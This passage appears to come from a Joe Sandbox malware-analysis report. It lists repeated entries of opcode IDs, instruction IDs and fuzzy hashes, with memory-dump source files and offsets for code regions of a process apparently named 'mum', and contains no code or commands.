                                      • Opcode Fuzzy Hash: f1a9bed67baa7dd20ff274dd2c38786884ff78b3fef461ed771778843f31ed31
                                      • Instruction Fuzzy Hash: A8D05E7021A208DBCA08DBA4D80866DB7AC9B06306F240044940A53651C7B00EB4EA95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4a3f7501dbb48cd952223a0a66620fcf3f72df386190cf8b94ad0c9361e655a
                                      • Instruction ID: ed5559290a38b11f468bbfcef95ce497ae9c29bbec64579c7baad000ee34cad3
                                      • Opcode Fuzzy Hash: f4a3f7501dbb48cd952223a0a66620fcf3f72df386190cf8b94ad0c9361e655a
                                      • Instruction Fuzzy Hash: ECF1C674A00218CFDBA4DF64C991BADB7B2EF89304F1080AAD91DA7755DB319E81CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2858f5b9fce9217414bfeaef36fa5a7f876dc477244ea47c85b0e8246b6d7261
                                      • Instruction ID: 6fd71cc37162c6801dc27f976b0952089155a1ac66cb349a45a9ed78f293b2c4
                                      • Opcode Fuzzy Hash: 2858f5b9fce9217414bfeaef36fa5a7f876dc477244ea47c85b0e8246b6d7261
                                      • Instruction Fuzzy Hash: 8EC1B275A10118DFDB19DF94C944E98BBB2FF09314F1680D5E609AB272C732E9A1EF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebd1d6ada290e4e527bfe72a555c55e8f8e5eeec03ddf562ff49b29e7bd28dfc
                                      • Instruction ID: 26bdf53edc1a35c092aa5573a7065edce167ae93845dd3f80bb1adabb67d2be8
                                      • Opcode Fuzzy Hash: ebd1d6ada290e4e527bfe72a555c55e8f8e5eeec03ddf562ff49b29e7bd28dfc
                                      • Instruction Fuzzy Hash: 3981D474A10218CFDB54DFA8C980B9DBBF2FB49314F2481A9D959AB346D731AD42CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba725099793af06a45246eceaa45b2e2994e9224b13a7e0eab572fa306d07107
                                      • Instruction ID: a64a785333d605970574fa15a7eef3446e79a6594bf3cfd07209b7234fafd466
                                      • Opcode Fuzzy Hash: ba725099793af06a45246eceaa45b2e2994e9224b13a7e0eab572fa306d07107
                                      • Instruction Fuzzy Hash: C451AC70A25619CFC708CF74C544ABEF7F2EF45700F558526E466AB292C774E890CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84db1781b9626e2045270e215892127066d0c96e7d7575c6ff9fd36be8c00778
                                      • Instruction ID: 293c8ced99664a95003ac64b18acfee16606777319be02f4353f76fe8d2739ff
                                      • Opcode Fuzzy Hash: 84db1781b9626e2045270e215892127066d0c96e7d7575c6ff9fd36be8c00778
                                      • Instruction Fuzzy Hash: BF71E674A00229CFDB55CF58C880BAAB7B2FF49304F148595E919AB356CB31EE86CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9f6405bfb218747b5021af0a8e4cd4ec926e51e46b01e9290b2bd15823afd4b
                                      • Instruction ID: bff8ff5aa8542c094877953a379ce57bf6d6b108e45bbb63f4d22fe908e48224
                                      • Opcode Fuzzy Hash: c9f6405bfb218747b5021af0a8e4cd4ec926e51e46b01e9290b2bd15823afd4b
                                      • Instruction Fuzzy Hash: 2C417078D25629EFCB04CFA8D9806EDBBF4AB0D300F206469E85AB3301E3719A519F54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0750a4d24eac7140185ccc10e42040adc284a38025ac316e1f8b1bc8bd4dbfa
                                      • Instruction ID: 11aeb0541324a6c71607600c8d6ab4f018c4ac90945a1dc0e33c0a36e9847b63
                                      • Opcode Fuzzy Hash: b0750a4d24eac7140185ccc10e42040adc284a38025ac316e1f8b1bc8bd4dbfa
                                      • Instruction Fuzzy Hash: A441D534A00218DFDB54DF68C951BA9B7B2FB89314F1480EAD90DAB345CB319E46CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_54c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93c5fe793667964a883cc9e5ec0ca00faa7587dcaf5c231c1a0041414260345e
                                      • Instruction ID: 2be0ba1a72ab255022aae6cccf615d519650c49babd7a559b5316625c95234a1
                                      • Opcode Fuzzy Hash: 93c5fe793667964a883cc9e5ec0ca00faa7587dcaf5c231c1a0041414260345e
                                      • Instruction Fuzzy Hash: 1641A47890A668CFDBA0DF25CC4C7EABBB2BB88301F1091DAD40DA6255D7715AC5CF04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 489ad557911b5c9f240747d651dbed640a20f7362a3d796ac0f1d896fa90dfdc
                                      • Instruction ID: 912607aa5b5dcc55750fcbebc9260362f9716239ba4ac40ce3380c42447b5008
                                      • Opcode Fuzzy Hash: 489ad557911b5c9f240747d651dbed640a20f7362a3d796ac0f1d896fa90dfdc
                                      • Instruction Fuzzy Hash: D341CF78E10218DFDB54DF68C881B99BBB1FF49304F2480AAE919A7345DB319A86CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40ec38e801b6582e62575c82d3e59d93c192e52b959f5acd4230a293694ac678
                                      • Instruction ID: 972688b9ea26f2ce74c1e92c37ccee17870df65ed52d3ef88a5709516828afce
                                      • Opcode Fuzzy Hash: 40ec38e801b6582e62575c82d3e59d93c192e52b959f5acd4230a293694ac678
                                      • Instruction Fuzzy Hash: 9E314170610B06CBC774DF2AC84475BBBF2FF88750B50866CE46A97A90D774E895CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956182965.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1ad000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61f57ca756283370d8b2729c2cb751a00dcd84a5caf2ff5e06248b592cb82b75
                                      • Instruction ID: a67482aacd3693eda1b3c05ca55378dc828bdaa871e5cef3f8227153adb18578
                                      • Opcode Fuzzy Hash: 61f57ca756283370d8b2729c2cb751a00dcd84a5caf2ff5e06248b592cb82b75
                                      • Instruction Fuzzy Hash: 43213478204604DFCB14CF20EA84B26BB65FB89314F30C5A9E90A4B646C33AD857CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956182965.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1ad000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d08282cf4cf962f1ad931cf98dcfa9ec82a427b1c8628119c10109d3a2ecdf4
                                      • Instruction ID: 8a43454cbe1b3c914392ae619503145edf3716906711dfa84e0b62499e50efd1
                                      • Opcode Fuzzy Hash: 9d08282cf4cf962f1ad931cf98dcfa9ec82a427b1c8628119c10109d3a2ecdf4
                                      • Instruction Fuzzy Hash: 08213B79604604DFDB05DF10E5C4B26BB65FB89314F30C56EE90B4B652C336D856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a571e08007bc542e895396631c45b6df6abfcafe0d60a88fbe782c7de92bdc0a
                                      • Instruction ID: 36b521beea5d39eff1f3e5f9ee848f65c62e95a0d6be2c1fd076c40999e53592
                                      • Opcode Fuzzy Hash: a571e08007bc542e895396631c45b6df6abfcafe0d60a88fbe782c7de92bdc0a
                                      • Instruction Fuzzy Hash: BB310474A24219CBDB14DFA4D888BEEBBF6FB08300F1045A6E509A7254EB718E849F41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bac8ea216ec6104d0d3dbd92b177891f4bbe8b3eb31285cda1b42d2ebf217b3d
                                      • Instruction ID: 25c8f00d78bb5a7aabc9b3fafef592c40ac3c054d43cfb584db9345cf9c593ba
                                      • Opcode Fuzzy Hash: bac8ea216ec6104d0d3dbd92b177891f4bbe8b3eb31285cda1b42d2ebf217b3d
                                      • Instruction Fuzzy Hash: 4521C575D24619DFCF08CFAAD8806EDBBF1AF4C310F20A06AD84AB7201E77099519F50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d01d4f2eb6abb12ab3931d05413f30b71a901f6366917bd0819b31403a55cad
                                      • Instruction ID: 8c624bb3b946f6dfe93d12cd764bbde81da7c0baf68fefdecd79c4c606474d25
                                      • Opcode Fuzzy Hash: 7d01d4f2eb6abb12ab3931d05413f30b71a901f6366917bd0819b31403a55cad
                                      • Instruction Fuzzy Hash: E121E874E25619DFCB04CFA9D5409EEBBF5EB49340F20902AE856B7302DB705A51DFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956182965.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1ad000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9aafb572f23d29ceb59a61a1f77312e81f842dd02c6af1eff1181a7f12a480d9
                                      • Instruction ID: ac041a09673297af15428b73e72b2d6efec10de483bc2424bc43b4a2cc147dcf
                                      • Opcode Fuzzy Hash: 9aafb572f23d29ceb59a61a1f77312e81f842dd02c6af1eff1181a7f12a480d9
                                      • Instruction Fuzzy Hash: 362150755087809FCB02CF24D994715BF71EF46314F28C5DAD8458F667C33A985ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20d6a74b4c75e7513e663b007b0067b96cc9fc38361731394a159333fc8b3da0
                                      • Instruction ID: 6601863a4489cf97dad12183edfaa06e7545d2219b8308375db16e5bafba90be
                                      • Opcode Fuzzy Hash: 20d6a74b4c75e7513e663b007b0067b96cc9fc38361731394a159333fc8b3da0
                                      • Instruction Fuzzy Hash: F3114C797541544F8789DB7C94589193BE29FDE25531600B9E50ACF3B2EE20CC82CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 886920243673ebaaea91d106015492dcc095dc9ac89c43a0a215a2c6ddb9897d
                                      • Instruction ID: f71f923f814a78ea916bc728b502e4d4cf79b71459e7829b3651b1318e44de6c
                                      • Opcode Fuzzy Hash: 886920243673ebaaea91d106015492dcc095dc9ac89c43a0a215a2c6ddb9897d
                                      • Instruction Fuzzy Hash: 4221AC7092820A8FDB18CFA8D8806EEBBF9BB09300F114466D404EB251EB70CD94CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2b44ee9ff019d85689913f726a8d99d0b835e484c9699f61d244e437246d3dad
                                      • Instruction ID: 15807e55384aa89766aff590d78b2c529fe5b9c87aeef594baece2077ddffe30
                                      • Opcode Fuzzy Hash: 2b44ee9ff019d85689913f726a8d99d0b835e484c9699f61d244e437246d3dad
                                      • Instruction Fuzzy Hash: C711E5303142866BC74D9B79995166EBB5BAFCB350F19806EA10ACF25BDF704C4087E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90a80d46ecbc217241dcf6eb72f6c2b935268ec5c08c7d18a20938e5e687abf7
                                      • Instruction ID: 12eec09619ec8ff889b5d2ba6a4f7a50ac068d3b08102cfadc158fc3599d5b6d
                                      • Opcode Fuzzy Hash: 90a80d46ecbc217241dcf6eb72f6c2b935268ec5c08c7d18a20938e5e687abf7
                                      • Instruction Fuzzy Hash: 6201083032400B5BC74CABB8995176EA68BAFCD350F248439A20ACB689DF708D5147E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956182965.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1ad000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
                                      • Instruction ID: b43b7d37f00788c8a6fec1e9b345aa07cf5b521aa1d595171d2f5edecda72261
                                      • Opcode Fuzzy Hash: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
                                      • Instruction Fuzzy Hash: 8F119D79504680DFCB16CF10E5C4B15FFA1FB85314F24C6AED84A4BA56C33AD84ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 906465b512b8494d9a09a1171f7d2afcad112a804f22af52169805a91cd05160
                                      • Instruction ID: 88c0800a4c23e1af47d3dd7fb06e1aac148135bc54077051e79ce0fe510e10be
                                      • Opcode Fuzzy Hash: 906465b512b8494d9a09a1171f7d2afcad112a804f22af52169805a91cd05160
                                      • Instruction Fuzzy Hash: 39115E70D24609CBDB08CFA9D8846EEB7F9AF49300F508426D509D7251EBB099D4CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2eefe5a6f44e1269dbfc7b8fc88a3bcb1954aa223eb9a4a0a66067976f0bb456
                                      • Instruction ID: 0e21389bcb81d53c6432922b6d025ab24d64673f77238e9de7400fc63d3a9da9
                                      • Opcode Fuzzy Hash: 2eefe5a6f44e1269dbfc7b8fc88a3bcb1954aa223eb9a4a0a66067976f0bb456
                                      • Instruction Fuzzy Hash: 9001ED797501144F8748EB7CD558D1E37E69FDD26532100B8E60ECB362EE20DC828BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a25127640a3eee025f726fb4eb3aab1780e78aacecae90b1f4d787e7cffce1a
                                      • Instruction ID: 725002830976ed7856e26822f2dc765eded3ea96acc6d57b044a53649d8f0d29
                                      • Opcode Fuzzy Hash: 2a25127640a3eee025f726fb4eb3aab1780e78aacecae90b1f4d787e7cffce1a
                                      • Instruction Fuzzy Hash: E5113A7092421ECBCB14DFA8E8846EEBBF5FF09304F114926E409E7250EB719994DF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57ba4c64e232148c649331826c7b7e3224c9f28d13a9a219c424aad3da7741e9
                                      • Instruction ID: ae78a1003d0a9d0f77008aa47d7eba62841728583d6a88689a85291d89a50e17
                                      • Opcode Fuzzy Hash: 57ba4c64e232148c649331826c7b7e3224c9f28d13a9a219c424aad3da7741e9
                                      • Instruction Fuzzy Hash: F4116734A6521DCFDB54CF24C948BADBBB6FF89300F0080A9940EA6355DB705E86DF02
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6750848fb1c6a0c80a0f2943149d14453912f75d72846976addb13d5cbcf955c
                                      • Instruction ID: c976df69884c4617a015390f2c6089d8ea47326f6d8a7dd3861e811f2a3609c5
                                      • Opcode Fuzzy Hash: 6750848fb1c6a0c80a0f2943149d14453912f75d72846976addb13d5cbcf955c
                                      • Instruction Fuzzy Hash: 09111870D2421ACBDB14CFA8D8846EEB7F5BB09304F114926D409EB250E7B19994CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3402bbcee82f3670a0325a6e8575c7fbf8ddca510ccc93e2baa5500f376473e7
                                      • Instruction ID: 54bfa88c117e0b7fd9ddda94b9f49747820d61e14c669630d50aaa915eb0b25e
                                      • Opcode Fuzzy Hash: 3402bbcee82f3670a0325a6e8575c7fbf8ddca510ccc93e2baa5500f376473e7
                                      • Instruction Fuzzy Hash: 28113970A2421ECFDB14CFA8D8846EEB7F9BF09300F114866D409EB240EB708994CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d26913d637ba80746aac42f85bfdae25181ca0808db624f27108ca8d42ffc7e0
                                      • Instruction ID: 148d1d48a0598a9ecd1546e8560e0709a89dace5e931e04b368fa766b5aa47de
                                      • Opcode Fuzzy Hash: d26913d637ba80746aac42f85bfdae25181ca0808db624f27108ca8d42ffc7e0
                                      • Instruction Fuzzy Hash: D21187B5E14648DBDB58CFA7D84049DFBB2BF99300B24D12AC416AB319EB705A068E45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.955588611.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_15d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 783569a65c1d0b3818bc5031a14b42e2466fab1e0d4f921a4a49a0cbd4603ef7
                                      • Instruction ID: a8f1ef0ae4fb088e0d498ed8485e304cd3a679d6650f88393d298682c536770f
                                      • Opcode Fuzzy Hash: 783569a65c1d0b3818bc5031a14b42e2466fab1e0d4f921a4a49a0cbd4603ef7
                                      • Instruction Fuzzy Hash: 0301A731008744EAD7718B66E884B67BFD8EF51725F14C056EE245E182D374D844C7B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 683518686f2cecd8ff19a5693a61a677442aab9a6dc2cf66ff01485bfc348645
                                      • Instruction ID: a42b2cfad32565e9711d7952a7a7b090cdc8ee1e6e588e444720d868a66836f7
                                      • Opcode Fuzzy Hash: 683518686f2cecd8ff19a5693a61a677442aab9a6dc2cf66ff01485bfc348645
                                      • Instruction Fuzzy Hash: 99115B7492420ACFDB18CFA9E8846AEB7F5BF09300F018426E509DB250EB709994DF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 910dc992ae2a6b55b7834209b1a4947c96c498cf53712cdb6ce90b99c46cb4dc
                                      • Instruction ID: 66804431af4e195a84d9e480bd1e27bdf37e33e984feb2e69fd06a374cc91e74
                                      • Opcode Fuzzy Hash: 910dc992ae2a6b55b7834209b1a4947c96c498cf53712cdb6ce90b99c46cb4dc
                                      • Instruction Fuzzy Hash: 97015E7493421ACFCB14CFA8D8842EEBBF9BB0D300F204526D459D7201E7B189948F41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4e52016609442c69b2706e605b971a363ccfdb73fc446f9282a85fcd015cd72
                                      • Instruction ID: 884b75fddbbe1f3df2bba48fa0743da13b9701be02b8e135d175b49b5396aa6f
                                      • Opcode Fuzzy Hash: e4e52016609442c69b2706e605b971a363ccfdb73fc446f9282a85fcd015cd72
                                      • Instruction Fuzzy Hash: C8015E30E102098BDB18DFA4C5547AEBBF9AB4D304F20002AD501F7384DBB599508BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418a4290d292ef9179e0f0240e99d983f1f9d3a3e469b9685a6eb0e5e7dd8016
                                      • Instruction ID: cdac159879feddf7465eb916d3b4266ce2e94626c8a1d298cd89b25e6f21d012
                                      • Opcode Fuzzy Hash: 418a4290d292ef9179e0f0240e99d983f1f9d3a3e469b9685a6eb0e5e7dd8016
                                      • Instruction Fuzzy Hash: 3AF04F797052544FC745A77C981895D3BE69FCE62131A40B6E90ACB3A2EE24CC868B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4189a0f3af479604f8a443de22e137971033a3c41c8e73425dae92629cf0e1e
                                      • Instruction ID: 5cb5cb618c3b3a94ff7c6ee874f5dd41107d6846db12703b1ffe6d716e10d15a
                                      • Opcode Fuzzy Hash: e4189a0f3af479604f8a443de22e137971033a3c41c8e73425dae92629cf0e1e
                                      • Instruction Fuzzy Hash: 68F0651120D7E51FC74767781C715AA3F258E8745430906EBC5C98F1E3CE195D1A83FA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.955588611.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_15d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6af2462fdeed0ea30e73843d353bd33243b2cdf2aa9b55677fbfe334190db5a3
                                      • Instruction ID: f67fec913ddd17da7ac38d7dbcf698f6170d40b7ce17ec71f47019fd2ac51fdb
